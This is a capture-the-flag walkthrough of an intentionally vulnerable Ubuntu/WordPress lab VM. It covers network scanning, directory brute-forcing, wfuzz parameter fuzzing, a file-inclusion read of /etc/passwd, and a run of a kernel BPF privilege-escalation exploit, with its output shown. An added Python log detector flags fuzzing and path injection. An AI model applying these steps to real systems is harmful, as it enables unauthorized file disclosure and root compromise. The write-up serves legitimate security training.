Download link: click here
Bilibili: click here
Information gathering
- After downloading and extracting the image, import it into the VM; it turns out to be an Ubuntu machine, the desktop edition at that.
- Set the network adapter to Host-Only (vmnet1); the subnet is 192.168.116.1/24.
- First, sweep the subnet with nmap to find live hosts.
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-20 07:16 CST
Nmap scan report for 192.168.116.1
Host is up (0.00044s latency).
Nmap scan report for 192.168.116.132
Host is up (0.00063s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.54 seconds
➜ ~
- The target's IP is 192.168.116.132; next, scan its open ports and services.
➜ ~ nmap -A -T4 192.168.116.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-20 07:17 CST
Nmap scan report for 192.168.116.132
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.13 seconds
- Port 80 is open, and the usual entry point is the web application. Opening it in a browser shows nothing but a single image, and the page source (F12) turns up nothing either.
- Run nikto first.
➜ ~ nikto --host http://192.168.116.132/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.116.132
+ Target Hostname: 192.168.116.132
+ Target Port: 80
+ Start Time: 2019-09-20 07:22:14 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://192.168.116.132/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
+ /wordpress/: A Wordpress installation was found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2019-09-20 07:22:26 (GMT8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- It is a WordPress site. The link header can be pretty-printed to see what useful information it holds; it looks like the route of a REST API endpoint, documented at http://v2.wp-api.org/. Since it is WordPress, test it with WPScan.
➜ ~ wpscan --url http://192.168.116.132/wordpress/
_______________________________________________________________
__ _______ _____
/ / __ / ____|
/ / /| |__) | (___ ___ __ _ _ __ ®
/ / / | ___/ \___ / __|/ _` | '_
/ / | | ____) | (__| (_| | | | |
/ / |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.116.132/wordpress/
[+] Started: Fri Sep 20 07:56:20 2019
Interesting Finding(s):
[+] http://192.168.116.132/wordpress/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.116.132/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.116.132/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.116.132/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.116.132/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.116.132/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.116.132/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Stored Comments
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9861
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16218
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
|
| [!] Title: WordPress 5.2.2 - Authenticated Cross-Site Scripting (XSS) in Post Previews
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9862
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16223
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
|
| [!] Title: WordPress 5.2.2 - Potential Open Redirect
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9863
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16220
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/c86ee39ff4c1a79b93c967eb88522f5c09614a28
|
| [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9864
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://fortiguard.com/zeroday/FG-VD-18-165
| - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
|
| [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Dashboard
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9865
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16221
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
|
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 5.2.3
| References:
| - https://wpvulndb.com/vulnerabilities/9867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/
| Latest Version: 1.4 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/readme.txt
| Style URL: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Fri Sep 20 07:56:22 2019
[+] Requests Done: 49
[+] Cached Requests: 5
[+] Data Sent: 12.599 KB
[+] Data Received: 462.296 KB
[+] Memory used: 184.582 MB
[+] Elapsed time: 00:00:02
➜ ~
- Nothing much found, apart from a directory listing at http://192.168.116.132/wordpress/wp-content/uploads/2019/08/. Continue with directory brute-forcing.
➜ ~ dirb http://192.168.116.132/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 20 08:11:33 2019
URL_BASE: http://192.168.116.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.132/ ----
+ http://192.168.116.132/dev (CODE:200|SIZE:131)
+ http://192.168.116.132/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.116.132/javascript/
+ http://192.168.116.132/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.116.132/wordpress/
---- Entering directory: http://192.168.116.132/javascript/ ----
==> DIRECTORY: http://192.168.116.132/javascript/jquery/
---- Entering directory: http://192.168.116.132/wordpress/ ----
+ http://192.168.116.132/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-includes/
+ http://192.168.116.132/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.116.132/javascript/jquery/ ----
+ http://192.168.116.132/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/ ----
+ http://192.168.116.132/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/includes/
+ http://192.168.116.132/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/user/
---- Entering directory: http://192.168.116.132/wordpress/wp-content/ ----
+ http://192.168.116.132/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.116.132/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/network/ ----
+ http://192.168.116.132/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.116.132/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.116.132/wordpress/wp-admin/user/ ----
+ http://192.168.116.132/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.116.132/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.116.132/wordpress/wp-content/plugins/ ----
+ http://192.168.116.132/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.116.132/wordpress/wp-content/themes/ ----
+ http://192.168.116.132/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.116.132/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Sep 20 08:12:01 2019
DOWNLOADED: 46120 - FOUND: 15
➜ ~
- There is a hint file: we have reached level 0. The hint says to use our tools to dig hard into the web application.
➜ ~ curl http://192.168.116.132/dev
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
➜ ~
- Add the -X option to specify the file extensions to scan for.
➜ ~ dirb http://192.168.116.132/ -X .php,.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 20 08:18:05 2019
URL_BASE: http://192.168.116.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.txt) | (.php)(.txt) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.132/ ----
+ http://192.168.116.132/image.php (CODE:200|SIZE:147)
+ http://192.168.116.132/index.php (CODE:200|SIZE:136)
+ http://192.168.116.132/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Fri Sep 20 08:18:10 2019
DOWNLOADED: 9224 - FOUND: 3
➜ ~
Fuzz
- Another hint: get the fuzzing tools ready.
➜ ~ curl http://192.168.116.132/secret.txt
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//
➜ ~
- The link is a wfuzz tutorial; naturally the wordlists are not provided. Two fuzzing projects worth recommending are https://github.com/fuzzdb-project/fuzzdb and https://github.com/danielmiessler/SecLists. They contain all kinds of common wordlists; fork one and add to it over time. I usually set an environment variable in my zshrc pointing at the wordlist directory so I don't have to type the path each time.
- This is exactly the same routine as in a post I wrote earlier (click here for reference): find the files first, then fuzz the parameter names, much like brute-forcing the parameter of a one-line webshell.
➜ ~ wfuzz -c -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt 'http://192.168.116.132/index.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://192.168.116.132/index.php?FUZZ=/etc/passwd
Total requests: 77
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 7 L 12 W 136 Ch "0"
000000002: 200 7 L 12 W 136 Ch "1"
000000003: 200 7 L 12 W 136 Ch "add"
000000004: 200 7 L 12 W 136 Ch "admin"
000000005: 200 7 L 12 W 136 Ch "alert"
000000006: 200 7 L 12 W 136 Ch "alter"
000000007: 200 7 L 12 W 136 Ch "auth"
000000008: 200 7 L 12 W 136 Ch "authenticate"
000000009: 200 7 L 12 W 136 Ch "append"
000000010: 200 7 L 12 W 136 Ch "calc"
000000011: 200 7 L 12 W 136 Ch "calculate"
000000012: 200 7 L 12 W 136 Ch "cancel"
000000013: 200 7 L 12 W 136 Ch "change"
000000014: 200 7 L 12 W 136 Ch "check"
000000016: 200 7 L 12 W 136 Ch "click"
000000015: 200 7 L 12 W 136 Ch "clear"
000000017: 200 7 L 12 W 136 Ch "clone"
000000018: 200 7 L 12 W 136 Ch "close"
000000019: 200 7 L 12 W 136 Ch "create"
000000020: 200 7 L 12 W 136 Ch "crypt"
000000021: 200 7 L 12 W 136 Ch "decrypt"
000000022: 200 7 L 12 W 136 Ch "del"
000000023: 200 7 L 12 W 136 Ch "delete"
000000024: 200 7 L 12 W 136 Ch "demo"
000000025: 200 7 L 12 W 136 Ch "disable"
000000026: 200 7 L 12 W 136 Ch "dl"
000000027: 200 7 L 12 W 136 Ch "download"
000000029: 200 7 L 12 W 136 Ch "enable"
000000030: 200 7 L 12 W 136 Ch "encrypt"
000000028: 200 7 L 12 W 136 Ch "edit"
000000031: 200 7 L 12 W 136 Ch "exec"
000000032: 200 7 L 12 W 136 Ch "execute"
000000033: 200 7 L 19 W 206 Ch "file"
000000034: 200 7 L 12 W 136 Ch "focus"
000000035: 200 7 L 12 W 136 Ch "get"
000000036: 200 7 L 12 W 136 Ch "help"
000000037: 200 7 L 12 W 136 Ch "initiate"
000000038: 200 7 L 12 W 136 Ch "is"
000000041: 200 7 L 12 W 136 Ch "ls"
000000042: 200 7 L 12 W 136 Ch "make"
000000043: 200 7 L 12 W 136 Ch "mod"
000000044: 200 7 L 12 W 136 Ch "mode"
000000046: 200 7 L 12 W 136 Ch "move"
000000047: 200 7 L 12 W 136 Ch "new"
000000048: 200 7 L 12 W 136 Ch "off"
000000049: 200 7 L 12 W 136 Ch "on"
000000039: 200 7 L 12 W 136 Ch "list"
000000040: 200 7 L 12 W 136 Ch "load"
000000045: 200 7 L 12 W 136 Ch "modify"
000000050: 200 7 L 12 W 136 Ch "open"
000000054: 200 7 L 12 W 136 Ch "put"
000000055: 200 7 L 12 W 136 Ch "query"
000000056: 200 7 L 12 W 136 Ch "read"
000000051: 200 7 L 12 W 136 Ch "post"
000000052: 200 7 L 12 W 136 Ch "proxy"
000000053: 200 7 L 12 W 136 Ch "pull"
000000062: 200 7 L 12 W 136 Ch "save"
000000058: 200 7 L 12 W 136 Ch "rename"
000000060: 200 7 L 12 W 136 Ch "retrieve"
000000061: 200 7 L 12 W 136 Ch "run"
000000057: 200 7 L 12 W 136 Ch "remove"
000000059: 200 7 L 12 W 136 Ch "reset"
000000063: 200 7 L 12 W 136 Ch "search"
000000064: 200 7 L 12 W 136 Ch "send"
000000065: 200 7 L 12 W 136 Ch "shell"
000000066: 200 7 L 12 W 136 Ch "show"
000000070: 200 7 L 12 W 136 Ch "to"
000000071: 200 7 L 12 W 136 Ch "toggle"
000000072: 200 7 L 12 W 136 Ch "update"
000000073: 200 7 L 12 W 136 Ch "upload"
000000074: 200 7 L 12 W 136 Ch "verify"
000000075: 200 7 L 12 W 136 Ch "view"
000000076: 200 7 L 12 W 136 Ch "vrfy"
000000067: 200 7 L 12 W 136 Ch "snd"
000000068: 200 7 L 12 W 136 Ch "subtract"
000000069: 200 7 L 12 W 136 Ch "test"
000000077: 200 7 L 12 W 136 Ch "with"
Total time: 0.083242
Processed Requests: 77
Filtered Requests: 0
Requests/sec.: 925.0118
➜ ~ wfuzz -c --hh 136 -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt 'http://192.168.116.132/index.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://192.168.116.132/index.php?FUZZ=/etc/passwd
Total requests: 77
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000033: 200 7 L 19 W 206 Ch "file"
Total time: 0.118026
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 652.3932
➜ ~
- Fuzzing shows that index.php accepts a file parameter: http://192.168.116.132/index.php?file=/etc/passwd returns a different length than the plain home page. Following the earlier hint, try reading http://192.168.116.132/index.php?file=location.txt, which gives yet another hint.
➜ ~ curl http://192.168.116.132/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>
➜ ~
- The hint says to try the secrettier360 parameter on another page. dirb found only two notable php files, so it must be http://192.168.116.132/image.php. Add secrettier360 and keep fuzzing. It turns out to allow arbitrary file reads: http://192.168.116.132/image.php?secrettier360=/etc/passwd. Read /etc/passwd.
➜ ~ curl http://192.168.116.132/image.php?secrettier360=/etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
guest-uw1hdg:x:999:999:Guest:/tmp/guest-uw1hdg:/bin/bash
</html>
➜ ~
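Seen from the server side, the wfuzz run above (dozens of distinct parameter names against index.php within seconds) and the reads through image.php?secrettier360= both leave a clear pattern in the access log. The following detector is an added example, not part of the original write-up; it runs over constructed Apache combined-format lines modelled on the page's requests (parameter names taken from the wordlist output, client 192.168.116.1 and the 192.168.116.50 browsing client are made up).

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log: a parameter-name fuzzing burst against index.php (the "file"
# hit is the only one with a different size), then path values sent to image.php.
FUZZED_NAMES = ["add", "admin", "auth", "check", "delete", "exec", "file",
                "get", "list", "shell", "upload", "view"]
SAMPLE_LOG = "\n".join(
    f'192.168.116.1 - - [20/Sep/2019:08:30:0{i % 10} +0800] '
    f'"GET /index.php?{name}=/etc/passwd HTTP/1.1" 200 {206 if name == "file" else 136} '
    f'"-" "Wfuzz/2.4"'
    for i, name in enumerate(FUZZED_NAMES)
) + """
192.168.116.1 - - [20/Sep/2019:08:41:17 +0800] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 2437 "-" "curl/7.66.0"
192.168.116.1 - - [20/Sep/2019:08:55:40 +0800] "GET /image.php?secrettier360=/home/saket/password.txt HTTP/1.1" 200 214 "-" "curl/7.66.0"
192.168.116.50 - - [20/Sep/2019:09:02:03 +0800] "GET /image.php?secrettier360=hacknpentest.png HTTP/1.1" 200 98765 "-" "Mozilla/5.0"
192.168.116.50 - - [20/Sep/2019:09:02:05 +0800] "GET /wordpress/ HTTP/1.1" 200 40312 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
# A query value that is an absolute path or climbs with ../ is a file-system path, not a resource name.
PATH_LIKE = re.compile(r"(^/)|(^[A-Za-z]:\\)|(\.\./)|(\.\.\\)")


def parse_line(line):
    """Parse one combined-format line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": url.path,
        "params": parse_qsl(url.query, keep_blank_values=True),  # values are URL-decoded
        "status": int(m.group("status")),
    }


def find_path_injection(events):
    """Flag every query parameter whose value looks like a file path."""
    alerts = []
    for ev in events:
        for key, value in ev["params"]:
            if PATH_LIKE.search(value):
                alerts.append({"ip": ev["ip"], "path": ev["path"], "param": key,
                               "value": value, "status": ev["status"]})
    return alerts


def find_param_fuzzing(events, threshold=8, window_seconds=60):
    """Flag a client that tries at least `threshold` distinct parameter names
    against one script within `window_seconds`."""
    by_target = defaultdict(list)
    for ev in events:
        if ev["params"]:
            by_target[(ev["ip"], ev["path"])].append(ev)
    alerts = []
    for (ip, path), evs in by_target.items():
        evs.sort(key=lambda e: e["ts"])
        best = set()
        for i, start in enumerate(evs):  # sliding window anchored at each event
            names = set()
            for ev in evs[i:]:
                if (ev["ts"] - start["ts"]).total_seconds() > window_seconds:
                    break
                names.update(k for k, _ in ev["params"])
            if len(names) > len(best):
                best = names
        if len(best) >= threshold:
            alerts.append({"ip": ip, "path": path, "distinct_params": len(best),
                           "sample": sorted(best)[:5]})
    return alerts


def analyze(log_text, threshold=8, window_seconds=60):
    """Run both detectors over a block of log text."""
    events = [e for e in (parse_line(line) for line in log_text.splitlines()) if e]
    return {"fuzzing": find_param_fuzzing(events, threshold, window_seconds),
            "path_injection": find_path_injection(events)}


if __name__ == "__main__":
    for kind, hits in analyze(SAMPLE_LOG).items():
        print(kind, len(hits))
        for hit in hits:
            print("  ", hit)
```

The fuzzing alert fires on the burst alone, before any payload succeeds; the path-injection alert singles out the two image.php reads while leaving the legitimate hacknpentest.png request untouched.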
- There is a guest account and a victor account, and it turns out the guest account can log in directly; normally it should not be possible to log in to the server this way. Only if the server exposes a VNC service could the guest account be used to log in.
root:x:0:0:root:/root:/bin/bash
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
guest-uw1hdg:x:999:999:Guest:/tmp/guest-uw1hdg:/bin/bash
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
- Logging in as the guest account, there is a server backup folder under /opt.
your password for backup_database file enc is
"backup_password"
Enjoy!
- Later, checking the Linux kernel version, it turns out privilege escalation works straight away. Well, that makes it rather boring, though it was not very interesting to begin with. An exploit is needed to get root in the end anyway, just not by logging in as guest directly. Besides, escalating from the guest account also knocked the web service over.
guest-uw1hdg@ubuntu:~/Desktop$ gcc exp.c
guest-uw1hdg@ubuntu:~/Desktop$ ./a.out
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff955bf2847500
[*] Leaking sock struct from ffff955bef6a6c00
[*] Sock->sk_rcvtimeo at offset 592
[*] Cred structure at ffff955bf0c7e0c0
[*] UID from cred structure: 999, matches the current: 999
[*] hammering cred structure at ffff955bf0c7e0c0
